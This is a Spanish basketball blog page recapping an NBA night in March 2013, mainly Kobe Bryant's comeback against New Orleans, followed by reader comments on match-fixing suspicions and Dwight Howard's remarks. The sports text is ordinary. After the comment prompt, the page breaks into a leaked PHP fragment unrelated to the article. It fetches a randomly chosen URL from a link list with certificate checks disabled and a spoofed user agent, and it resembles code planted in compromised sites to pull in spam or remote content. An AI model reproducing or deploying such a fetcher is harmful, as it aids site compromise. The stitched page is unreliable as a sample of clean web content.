La Crónica: el orgullo de Kobe

07 de March de 2013 por Simon

14 partidos se disputaron anoche en la NBA. Tan sólo Denver y Oklahoma City no entraban ayer en acción. La jornada nos dejó una nueva demostración de orgullo de Kobe, algunos buzzer-beaters y muchas, muchísimas remontadas.

Los líderes de ambas conferencias, aunque de manera muy distinta, vencieron anoche sus respectivos choques. San Antonio tenía un incómodo partido en la noche de ayer ante Chicago Bulls que supo resolver sin mayores problemas con una gran segunda mitad. Ambos equipos tenían la baja de su base estrella. Manu Ginóbili se vistió de base de ocasión para dirigir a los suyos desde el banquillo en ausencia de Tony Parker para acabar el partido con 18 puntos y 9 asistencias. Tras un buen primer tiempo por parte de los Bulls, en el tercer cuarto San Antonio empezó minimizar las concesiones que había tenido Chicago en la primera mitad, para en el último cuarto terminar con toda opción para los Bulls gracias al gran juego colectivo al que nos tienen acostumbrados estos Spurs (83-101). Tim Duncan tuvo un gran juego anoche, 18 puntos, 10 rebotes y 5 tapones, cuánto de menos lo vamos a echar cuando falte.

Ayer visitaba el American Airlines Arena de Miami el segundo peor equipo de la liga y esto, unido a la racha de Miami, hacían prever un partido plácido para James y los suyos. Nada más lejos de la realidad. Los Magic presentaron pelea hasta el mismísimo último segundo. Tras una primera parte muy plácida para Miami, + 15 al descanso, un gran tercer cuarto de Magic, liderados por Harris y Harkless consiguieron limar casi toda la diferencia hasta el punto de que al comienzo del último cuarto, Orlando ya estaba por delante en el marcador. En los últimos 30 segundos Magic perdió varias oportunidades de anotar, y en la última jugada del encuentro James anotaba una penetración para poner por delante a Miami con tan sólo 3 segundos por jugar lo que significó a la postre la decimosexta victoria consecutiva para Miami (96-97). Impresionante 25+21 de Vucevic. James anotó 26 puntos, incluyendo la canasta de la victoria, pero anoche se quedó en sólo 3 rebotes y 2 asistencias su aportación. Wade aportó 24 puntos.

kobe meeksEl duelo por las dos últimas plazas de Play Off en la conferencia Oeste vivió anoche un nuevo capítulo a tres bandas. A pesar de sus dolores en el codo, Kobe Bryant se vistió una vez más de héroe para Lakers. 42 puntos anotó anoche Bryant a los que añadió 12 asistencias, 13 esos puntos fueron en los últimos 6 minutos en los que Lakers se salvó de la derrota con un parcial de 20-0 que les permitió remontar un partido que parecía perdido a todas luces por las importantes ventajas que había manejado NOLA durante todo el encuentro. Howard fue determinante anoche con 20 puntos, 15 rebotes y un gran tapón a Robin López en el último minuto (102-108). Por su parte Houston cayó ante Dallas por tercera vez esta temporada. El partido fue muy igualado en todas sus fases, pero en los últimos minutos la experiencia de Dallas se impuso para cerrar el partido (108-112). Harden no tuvo su mejor noche en el tiro aunque terminó con 28 puntos. Utah sigue con su mala racha y ayer perdió ante Cleveland Cavaliers un partido que parecía en sus manos al inicio del último cuarto. Cavs fue capaz de remontar de la mano de un espectacular Kyrie Irving (101-104).

Indiana dio traspiés ayer en su lucha por el segundo puesto de la conferencia Este cayendo en casa ante Boston Celtics. Tras dominar los tres primeros cuartos con ventajas cómodas aunque no excesivas Indiana se dejó remontar 10 puntos en el último cuarto. Con empate a 81 fue Jeff Green el que anotó la canasta definitiva para Celtics. El mejor de Boston fue Garnett con 18 puntos y 10 rebotes con una buena aportación del banquillo (81-83). New York Knicks consiguió anoche la victoria a domicilio ante Detroit Pistons sin Carmelo Anthony de baja tras su lesión de rodilla. Sin Anthony, Stoudemire volvió a ser el líder de los Knicks para llevarse la victoria con un gran último cuarto. Por segunda noche consecutiva, el banquillo Knicks anotó más que el equipo titular. La tripleta Felton, Stoudemire, y JR Smith anotaron 68 puntos (87-77).

Griffin bucksLos Ángeles Clippers recibían a unos Bucks lanzados en sus últimos encuentros. Desde el inicio Clips jugó un partido muy serio que le permitió no pasar apuros en ningún momento durante todo el partido (101-117). Griffin estuvo espectacular con un triple doble de 23 puntos, 11 rebotes y otras tantas asistencias. Poco más pudo hacer Milwaukee que se encontró a unos Clippers lanzados que les superaron en todas las facetas del juego. Por su parte, Memphis continúa con su gran momento y anoche logró una nueva victoria ante Portland (85-91) Sin Zach Randolph fue Marc el líder de Memphis con 23 puntos y 12 rebotes. Durante la primera parte Portland anotaba con fluidez, de ahí que sus ventajas llegaran hasta los 17 puntos, pero en la segunda parte Memphis fue capaz de imponer su estilo de juego y poco a poco ir recortando las diferencias para terminar llevándose la victoria.

Minnesota y Toronto cortaron sus rachas de derrotas ante Washington y Phoenix respectivamente. Los Wolves tuvieron en Ricky Rubio el líder que les llevó a la victoria con 15 puntos, 11 asistencias y 7 rebotes (82-87). Barea fue determinante en los últimos minutos. Por su parte Toronto metió una buena paliza a los Suns con un gran partido en general de casi todos sus jugadores (98-71).

En el resto de la jornada, Brooklyn venció a Charlotte (99-78) sin problemas. Atlanta dio buena cuenta de Philadelphia (96-107) con un partidazo de Jeff Teague y Golden State Warriors no se dejó sorprender y venció a Sacramento en un partido tosco y lleno de imprecisiones (83-87).

PREMIOS

MVP: Kobe Bryant lideró la espectacular remontada de los Lakers con unos totales de 42 puntos (14 de 21 en tiros de campo), 7 rebotes y 12 asistencias. Por su parte, Blake Griffin consiguió el tercer triple doble de su carrera con  23 puntos, 11 rebotes y 11 asistencias.

Rookie: Damian Lillard empezó como un tiro pero acabó con 20 puntos y 4 asistencias, que no está nada mal. Michael Kidd-Gilchrist anotó 17 puntos, cogió 5 rebotes y robó un par de balones.

Sorpresa: Anthony Tolliver apareció desde el banquillo para dar un paso al frente y anotar 5 triples que resultaron claves para la victoria de su equipo. Acabó el partido con 21 puntos y 8 rebotes.

Decepción: Lamentable partido de los Phoenix Suns en el que ningún titular fue capaz de anotar de llegar a los 10 puntos. Por su parte, Nene Hilario se las ingenió para perder 7 balones.

Esfuerzo en vano: Descomunal actuación de Nikola Vucevic que queda sin premio. 25 puntos, 21 rebotes y 4 asistencias para el pívot de Montenegro ante los actuales campeones, a los que parece haber tomado la medida. Su anterior 20-20 también lo consiguió frente ellos.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

23 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De anoche vi el Pacers-Celtics en el que tras un arranque bueno de Boston con KG anotando de forma fluida, Indiana tomó el mando durante casi todo el partido gracias a su intensidad y al dominio del rebote. Boston hacía la goma con aportaciones de casi todos y aprovechando el día horrible de Paul George al que los exteriores verdes dejaron en 7/22 en tiros y que faltaba Danny Granger. El caso es que el partido fue con ventajas cómodas de Indiana hasta 3 minutos del final, momento en el que mandaban de 9 puntos tras triple de George que parecía dar casi la puntilla. Pues no, desde ahí 11-0 para Boston y remontada para ganar el partido. Los Pacers evidenciaron lo que tantas veces nos hace dudar de ellos y es la falta de un jugador estrella al que darle el balón en esos momentos de presión y la experiencia de Boston en partidos igualados hizo el resto. Mención especial para la canasta de la victoria “made in Doc Rivers”. Con todos esperando un pick&roll Pierce-Garnett, Pierce al que hace el bloqueo es a Green y este acaba anotando bajo canasta liberado de su marcaje. Qué gran entrenador es Doc. Boston coge prácticamente a Chicago y tiene a tiro de piedra a Atlanta y Brooklyn.
    Del resto destaca sobre todo el gran paso hacia PO de los Lakers. Su victoria, gracias a una nueva heroicidad de Kobe todo hay que decirlo, y las derrotas de Jazz y Rockets les meten ya de lleno por la pomada de las plazas 7 y 8 del Oeste. Esperemos que acaben entrando en PO y lo dice uno que no es precisamente aficionado amarillo.

      Citar

  2. Oli dice:
    #2

    Increible Kobe a este nivel lleva a los lakers a playoffs él solito jeje, si ganan sus dos proximos partidos en casa a Toronto y Chicago creo que cojen a los Jazz que tienen dos salidas bastante dificiles los knicks y los bulls.

    Y lo de lebron no tiene nombre, yo soy anti-lebron pero hay que admitir su superioridad y la de los heat yo creo que pueden batir el record de 22 victorias de los rockets si no despistan, y aun cuando les pasa como ayer acaban ganando.

      Citar

  3. Esteban dice:
    #3

    kobe señores, si los lakers perdian ayer, la cosa se nublaba enserio, pero NO, tremendo bryant y una nueva victoria que deberia de seguirle otra frente a toronto, y de local frente a los bulls, para meterse ya en zona de PO y no dejarla mas

    oh mama, eh visto a kobe bryant

      Citar

  4. Esteban dice:
    #4

    igualmente, alguien lo tenia que decir, remontar 20 puntos los lakers… tiene un olor a “hornets hoy no pueden ganar que nos perdemos de los lakers en po”

    no creo en los arreglos de juegos, pero… que los hay los hay

      Citar

  5. Alfredo dice:
    #5

    Celtics y Lakers competidores natos…

      Citar

  6. Jose Luis dice:
    #6

    No se, tampoco hay muchas jugaadas dudosas, quiza el out of bounds de Gordon. No hubo muchos tiros libres ni nada por el estilo. Veo mas un poco de mala suerte hornet y un poco de tanqueo tardío, aparte de que Bryant convertía en oro todo lo que salia de sus manos, tanto tiros como asistencias.

    La defensa de los Hornets en campo contrario, en el saque de banda de Blake… ¿qué leches hacen? Si dejan autopista libre hacia el aro a Bryant y creo que Meeks!

      Citar

  7. rumbero dice:
    #7

    Jose Luis:
    La defensa de los Hornets en campo contrario, en el saque de banda de Blake… ¿qué leches hacen? Si dejan autopista libre hacia el aro a Bryant y creo que Meeks!

    De benjamines. Entre esta y el triple que mete Meeks absolutamente sólo para ponerse a 2 se han lucido.
    Lo de Bryant es un escándalo. Si estos Lakers estuvieran más arriba hablariamos de candidato al MVP pero con esta defensa es imposible. Harían bien en los Lakers en coger el hábito de defender algo durante todo el partido y no cuando vas 20 abajo. El otro día contra Hornets 71 puntos en la primera mitad y esta madrugada 67 (creo que record de Hornets esta temporada). Esto en PO es irse para casa por mucho que Bryant se pongo en modo semi-dios

    Lo de Vucevic contra Miami es tremendo también. Ay si lo tuviera alguno del este que van a estar en los PO…

      Citar

  8. Ruxixón dice:
    #8

    Próxima jornada importante para Lakers,noche del viernes,Utah jugando en Chicago (los Bulls este año están flojos en su casa),Houston en Golden State (estando reciente lo del intento de record de triples de Houton allí) y los Lakers reciben a los Raptors.No hay que olvidar la pana que le estaba metiendo NOLA a los Lakers hasta que apareción Kobe así que no me fiaría ni un pelo de un partido a muchos puntos con los DeRozan,Gay,Lowry…es para estar atentos del partido de los Rockets @ Warriors puesto que si pierde Golden State es otro equipo que se suma a la lucha de estos 3 para meterse en PO.Pinta a superviernes.

      Citar

  9. Esteban dice:
    #9

    hay un triple de meeks donde lo dejan solito inentendiblemente, mas varias acciones ofensivas de los hornets donde no se entiende lo mal q atacaron, la perdida por fuolo ofensivo de gordon

    cuando digo arreglado, no solo de los arbitros sino los propios hornets se dejaron llevar

      Citar

  10. Jose Luis dice:
    #10

    Si sí, yo lo he dicho, los Hornets pudieron dejarse llevar, para eso están abajo.

      Citar

  11. txusma dice:
    #11

    He visto mates de concurso peores que el de Griffin a pase de Crawford…

      Citar

  12. Denise dice:
    #12

    A pesar de la mierda de temporada que está haciendo Howard, no se le cae la cara de verguenza de decir: Mi equipo en Orlando estaba lleno de gente . Yo era el lider, y los lideraba con una sonrisa en la cara”

    Ante este disparate, Rashard Lewis y Jameer Nelson le han contestado de forma elegante pero diciendo un puñado de verdades.

    Lewis: “Es irrespetuoso. Todos nosotros ayudamos a Howard en convertirse en el jugador que es. Hicimos una gran marca, joder..mirad la clasificación (ganadores de conferencia y varias veces de división). Eramos un grupo muy cerrado, y Jameer y él eran grandes amigos”

    Nelson: “¿Cuando vas a comportarte como un hombre, a madurar y a ser capaz de estar alejado de los medios, ser un profesional. Me gustaría ser menos hombre para comentar ciertas cosas que algunos dicen sobre mí y mis compañeros. Tuvimos una gran trayectoria como equipo, estábamos unidos y él fue parte de eso. Conseguimos alcanzar las finales en 2009. Él estaba aquí, como para que dijera esas cosas tan negativas

    Otis Smith: Con sus palabras, Howard tiró a Nelson debajo de un autobus. Jameer mantuvo la boca cerrada cuando DH quería jugar al lado de grandes bases como Billups o Paul y fue este chico (Nelson) quien nos ayudó a llegar a la final jugando hasta lesionado.”

      Citar

  13. Denise dice:
    #13

    A todo esto….el mejor hombre de Magic en aquella temporada que llegaron a la final fue, desde mi punto de vista, claramente Rashard Lewis. Y posiblemente, hasta Turkoglu por momentos era el 2º lider del equipo.

      Citar

  14. Denise dice:
    #14

    A todo esto..Howard visita por primera vez desde su marcha la pista de Orlando la semana que viene. Parece como si quisiera que le recibieran a silbidos y pitos.

      Citar

  15. MagicJohnson32 dice:
    #15

    Denise:
    A pesar de la mierda de temporada que está haciendo Howard, no se le cae la cara de verguenza de decir:Mi equipo en Orlando estaba lleno de gente . Yo era el lider, y los lideraba con una sonrisa en la cara”

    Ante este disparate, Rashard Lewis y Jameer Nelson le han contestado de forma elegante pero diciendo un puñado de verdades.

    Lewis: “Es irrespetuoso. Todos nosotros ayudamos a Howard en convertirse en el jugador que es. Hicimos una gran marca, joder..mirad la clasificación (ganadores de conferencia y varias veces de división). Eramos un grupo muy cerrado, y Jameer y él eran grandes amigos”

    Nelson: “¿Cuando vas a comportarte como un hombre, a madurar y a ser capaz de estar alejado de los medios, ser un profesional. Me gustaría ser menos hombre para comentar ciertas cosas que algunos dicen sobre mí y mis compañeros. Tuvimos una gran trayectoria como equipo, estábamos unidos y él fue parte de eso. Conseguimos alcanzar las finales en 2009. Él estaba aquí, como para que dijera esas cosas tan negativas

    Otis Smith: Con sus palabras, Howard tiró a Nelson debajo de un autobus. Jameer mantuvo la boca cerrada cuando DH quería jugar al lado de grandes bases como Billups o Paul y fue este chico (Nelson) quien nos ayudó a llegar a la final jugando hasta lesionado.”

    JJ Redick ha rajado también. Ha dicho algo como que ya va siendo hora de que sea un líder, que no puede pretender llevarse los méritos y no comportarse como un líder. En realidad creo que lo que quiere decir es que calle la p… boca xD

      Citar

  16. txusma dice:
    #16

    No ha dicho realmente que aquellos Orlando Magic estaban llenos de jugadores que nadie quería? Hoy he visto que ha declarado que no se habian entendido bien sus palabras: él quería decir que eran un grupo de ‘underdogs’, es decir, los eternos perdedores, en los que nadie confiaba para ganar…

    Vaya excusa…

      Citar

  17. Denise dice:
    #17

    txusma:
    No ha dicho realmente que aquellos Orlando Magic estaban llenos de jugadores que nadie quería? Hoy he visto que ha declarado que no se habian entendido bien sus palabras: él quería decir que eran un grupo de ‘underdogs’, es decir, los eternos perdedores, en los que nadie confiaba para ganar…

    Vaya excusa…

    Si..no lo llegué a escribir en mi primer comentario. Dijo que estaba lleno de jugadores que nadie quería

    “My team in Orlando was a team full of people who nobody wanted, and I was the leader and I led that team with a smile on my face”

    Ahora se ha retractado y dice que lo que quería decir es que su equipo estaba infravalorado.

    La cuestión es que por lo visto hay un video donde claramente dice lo primero, lo de que su equipo estaba lleno de “mierdas” por decirlo de alguna manera, por lo que parece una nueva payasada de Howard.

      Citar

  18. Denise dice:
    #18

    Aquí está el video en concreto. Juzgar por vosotros mismos

    http://www.orlandosentinel.com/sports/blogs/magic-basketblog/os-mbb-dwight-howard-clarifies-orlando-magic-comment-20130307,0,3431691.post

    Y Redick le ha dado un buen repaso: “No estoy sorprendido. Estaría mas sorprendido si empezase a tomar mas responsabilidad. Es lo más negativo que puedo decir, pero es la verdad”

    I’m not surprised by it, I would be more surprised when Dwight starts taking responsibility. That would be the most negative thing I can say, but that’s the truth.”

      Citar

  19. Denise dice:
    #19

    Bueno, acabo de ver el resumen de NOH-LAK. Creo que ya se ha comentado algo por aquí, pero vaya manera de perder un partido por parte de los Hornets. Sin anotar en los últimos 7 minutos, y con jugadas escandalosas como un triple de Meeks completamente solo mientras 4 tios de los Hornets estan tocandose los cojones en el lado opuesto. Y la del saque de banda, oh!!!!. Por cierto, cuantos pasos da Kobe en esa jugada, 3, 4, 5? Normal que se recorra la media cancha en segundo y medio.

      Citar

  20. nba dice:
    #20

    Esteban:
    cuando digo arreglado, no solo de los arbitros sino los propios hornets se dejaron llevar

    No se Esteban, algunas jugadas de los Hornets se pùeden entender, pero entonces como llamariamos a la temporada de Lakers, en la que no defienden nada, salvo contadas ocasiones.Que tambien estos Lakers estan haciendo tankeo para ver si echan a D’antoni?, porque sino ciertas actitudes en la cancha no tienen explicacion

      Citar

  21. Esteban dice:
    #21

    nba: No se Esteban, algunas jugadas de los Hornets se pùeden entender, pero entonces como llamariamos a la temporada de Lakers, en la que no defienden nada, salvo contadas ocasiones.Que tambien estos Lakers estan haciendo tankeo para ver si echan a D’antoni?, porque sino ciertas actitudes en la cancha no tienen explicacion

    lo decia por decire, no digo que el partido haya estado amañado, pero la diferencia era grande y de un momento a otro los hornets no anotaron ni un punto mas, perdieron bolas tontas y dejaron triples libres a los lakers

      Citar

  22. Esteban dice:
    #22

    Denise:
    Bueno, acabo de ver el resumen de NOH-LAK. Creo que ya se ha comentado algo por aquí, pero vaya manera de perder un partido por parte de los Hornets. Sin anotar en los últimos 7 minutos, y con jugadas escandalosas como un triple de Meeks completamente solo mientras 4 tios de los Hornets estan tocandose los cojones en el lado opuesto. Y la del saque de banda, oh!!!!. Por cierto, cuantos pasos da Kobe en esa jugada, 3, 4, 5? Normal que se recorra la media cancha en segundo y medio.

    el triple de meeks ese es realmente extraño, como tambien que los lakers anoten en el ultimo cuarto casi tanto como en todo el partido, mas justo cuando de lo que se habla en la nba es de la remontada de los lakers

    pero bueno, solo una percepcion

      Citar

  23. Esteban dice:
    #23

    kris HUMPRIES apartado completamente de la rotacion de los NETS

    alto chivo expiatorio a quien culpar por su campaña, nada de echarse sobre jojo, deron o wallace, la dirigencia o el entrenador

    las culpas son de humpries que ha jugado pesimo y tiene un contrato enorme
    en primer lugar cuando lo mandaron al banco no esataba jugando muy mal, el problema estaba en otros jugadores
    luego fueron quitandole protagonismo hasta hacerlo desaparecer por completo

    no se ustedes, pero si bien humpries era un problema para los NETS ni de coña ha sido el culpable de la mala campaña del equipo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>